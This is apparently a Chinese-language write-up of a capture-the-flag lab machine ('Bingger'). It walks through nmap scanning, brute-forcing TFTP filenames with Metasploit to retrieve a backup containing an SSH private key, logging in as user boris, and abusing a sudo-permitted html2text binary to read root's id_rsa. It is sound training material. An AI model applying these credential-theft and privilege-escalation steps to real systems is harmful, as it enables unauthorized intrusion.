# 靶场搭建

下载:Bingger

Nat 使用

IP: 192.168.1.133

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.56 (Debian)

80 端口提示,敏感文件泄露

web 端跑成傻逼了都没跑出来

可能是别的泄露,UDP 拉出来跑一下

PORT   STATE         SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp

tftp 服务,用 tftp 连上去瞅了一下,发现没有 ls 功能,只有爆破了

msf 启动!

msf6 auxiliary(scanner/tftp/tftpbrute) > set RHOSTS 192.168.1.133
RHOSTS => 192.168.1.133
msf6 auxiliary(scanner/tftp/tftpbrute) > run

[+] Found backup-config on 192.168.1.133
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

找到了一个 backup-config

OK 了家人解压看看

有一个 id_rsa 和一个配置文件

看一下配置文件内容,过滤下注释的信息

┌──(root㉿kali)-[~/backup]
└─# cat sshd_config| grep -v -e ^# -e ^$    
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
PrintLastLog no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server
Match User boris
    PasswordAuthentication no

看到有个用户叫 boris 不需要密码,用 id_rsa 登录到 ssh

# 提权

sudo -l 发现有个 html2text 的程序

试了一下,text 输出有格式的,那就比较麻烦了,本来想把 key 写入到 root 的,发现输出格式不对,所以只能从 root 下读取 id_rsa 了,读到之后编辑一下。

直接 SSH 到 root 上,OK 了家人。

# 小结

vi、nano 最好还是熟练使用吧,不然改起来太痛苦了。